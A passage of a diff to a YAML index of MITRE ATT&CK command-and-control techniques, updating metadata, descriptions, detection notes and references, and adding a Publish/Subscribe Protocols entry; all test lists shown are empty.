-        url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
-        description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
-          Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
-          April 26, 2019.
-      - source_name: Elastic Predicting DGA
-        url: https://arxiv.org/pdf/1611.00791.pdf
-        description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
-          2). Predicting Domain Generation Algorithms with Long Short-Term Memory
-          Networks. Retrieved April 26, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
-      name: Domain Generation Algorithms
-      description: |-
-        Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
-        DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
-        Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: command-and-control
-      x_mitre_detection: |-
-        Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
-        Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
-      x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
+        url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+      - source_name: Akamai DGA Mitigation
+        description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+          Domain Generation Algorithms. Retrieved February 18, 2019.
+        url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+      - source_name: Cisco Umbrella DGA
+        description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+          Why so effective?. Retrieved February 18, 2019.
+        url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+      - source_name: Cybereason Dissecting DGAs
+        description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+          Eight Real World DGA Variants. Retrieved February 18, 2019.'
+        url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+      - source_name: Unit 42 DGA Feb 2019
+        description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+          Generation Algorithms (DGA). Retrieved February 19, 2019.'
+        url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      x_mitre_data_sources:
-      - 'Network Traffic: Network Traffic Flow'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.004:
     technique:
@@ -36730,9 +37153,67 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.004
     atomic_tests: []
+  T1071.005:
+    technique:
+      modified: '2024-10-16T13:08:35.629Z'
+      name: Publish/Subscribe Protocols
+      description: "Adversaries may communicate using publish/subscribe (pub/sub)
+        application layer protocols to avoid detection/network filtering by blending
+        in with existing traffic. Commands to the remote system, and often the results
+        of those commands, will be embedded within the protocol traffic between the
+        client and server. \n\nProtocols such as <code>MQTT</code>, <code>XMPP</code>,
+        <code>AMQP</code>, and <code>STOMP</code> use a publish/subscribe design,
+        with message distribution managed by a centralized broker.(Citation: wailing
+        crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+        messages by topics, while subscribers receive messages according to their
+        subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+        publish/subscribe protocols to communicate with systems under their control
+        from behind a message broker while also mimicking normal, expected traffic."
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: command-and-control
+      x_mitre_contributors:
+      - Domenico Mazzaferro Palmeri
+      - Sofia Sanchez Margolles
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Flow'
+      - 'Network Traffic: Network Traffic Content'
+      type: attack-pattern
+      id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+      created: '2024-08-28T14:14:18.512Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1071/005
+        external_id: T1071.005
+      - source_name: wailing crab sub/pub
+        description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+          21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+          August 28, 2024.
+        url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+      - source_name: Mandiant APT1 Appendix
+        description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+          Retrieved July 18, 2016.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1573.001:
     technique:
       modified: '2023-12-26T20:58:19.356Z'
@@ -36778,7 +37259,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1568.001:
     technique:
@@ -36810,7 +37290,7 @@ command-and-control:
         url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
         description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
           are they and how do they work?. Retrieved March 11, 2020.'
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T16:10:37.183Z'
       name: Fast Flux DNS
       description: |-
         Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
@@ -36832,22 +37312,20 @@ command-and-control:
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071:
     technique:
-      modified: '2024-01-17T22:52:23.454Z'
+      modified: '2024-08-28T14:10:33.145Z'
       name: Application Layer Protocol
       description: "Adversaries may communicate using OSI application layer protocols
         to avoid detection/network filtering by blending in with existing traffic.
         Commands to the remote system, and often the results of those commands, will
         be embedded within the protocol traffic between the client and server. \n\nAdversaries
         may utilize many different protocols, including those used for web browsing,
-        transferring files, electronic mail, or DNS. For connections that occur internally
-        within an enclave (such as those between a proxy or pivot node and other nodes),
-        commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
-        Spy Email Nov 22) "
+        transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+        that occur internally within an enclave (such as those between a proxy or
+        pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+        Mandiant APT29 Eye Spy Email Nov 22) "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -36869,7 +37347,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -36894,7 +37372,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071
     atomic_tests: []
   T1219:
@@ -36978,7 +37455,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1219
     atomic_tests: []
   T1659:
@@ -37042,11 +37518,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37130,7 +37605,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -37161,7 +37635,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37181,8 +37655,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37204,8 +37678,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37267,7 +37739,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37315,7 +37786,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37369,7 +37839,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37402,7 +37871,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37422,8 +37891,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37461,7 +37928,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37489,42 +37956,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37533,17 +37980,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -37575,7 +38044,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37592,8 +38061,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -37613,7 +38080,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37636,8 +38103,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -37662,7 +38127,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37687,8 +38152,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -37753,7 +38216,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -37777,7 +38239,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37802,21 +38264,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37835,7 +38312,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37849,6 +38326,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -37862,12 +38344,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37917,11 +38398,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37930,20 +38410,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -37968,17 +38448,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
